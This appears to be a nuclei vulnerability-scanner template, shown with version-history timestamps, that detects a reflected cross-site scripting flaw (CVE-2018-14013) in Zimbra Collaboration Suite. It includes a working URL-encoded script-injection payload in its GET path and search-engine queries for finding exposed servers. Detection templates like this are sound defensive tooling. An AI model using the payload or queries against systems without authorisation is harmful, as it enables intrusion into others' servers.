nuclei-templates/http/cves/2018/CVE-2018-14013.yaml

55 lines
2.2 KiB
YAML
Raw Normal View History

2021-07-27 07:34:36 +00:00
id: CVE-2018-14013
info:
name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
2021-07-27 07:34:36 +00:00
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.
reference:
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109018
- https://bugzilla.zimbra.com/show_bug.cgi?id=109017
- https://nvd.nist.gov/vuln/detail/CVE-2018-14013
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.0065
epss-percentile: 0.7936
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: synacor
product: zimbra_collaboration_suite
2024-05-31 19:23:20 +00:00
shodan-query: http.title:"zimbra collaboration suite"
fofa-query: title="zimbra web client sign in"
google-query: intitle:"zimbra collaboration suite"
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,xss,zimbra,synacor
2021-07-27 07:34:36 +00:00
http:
2021-07-27 07:34:36 +00:00
- method: GET
path:
2021-08-03 07:43:57 +00:00
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-27 07:34:36 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-27 07:34:36 +00:00
words:
2021-08-03 07:43:57 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-27 07:34:36 +00:00
- type: word
part: header
words:
- text/html
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502210090246985aa33f0e41c9ed59146b95be1f9cdf7ab26257777ce98c063ed12309c02202b81c53a22187906b5e2321ac991e64fe0ee52372aee7f041ea1d9de847edb66:922c64590222798bb761d5b6d8e72950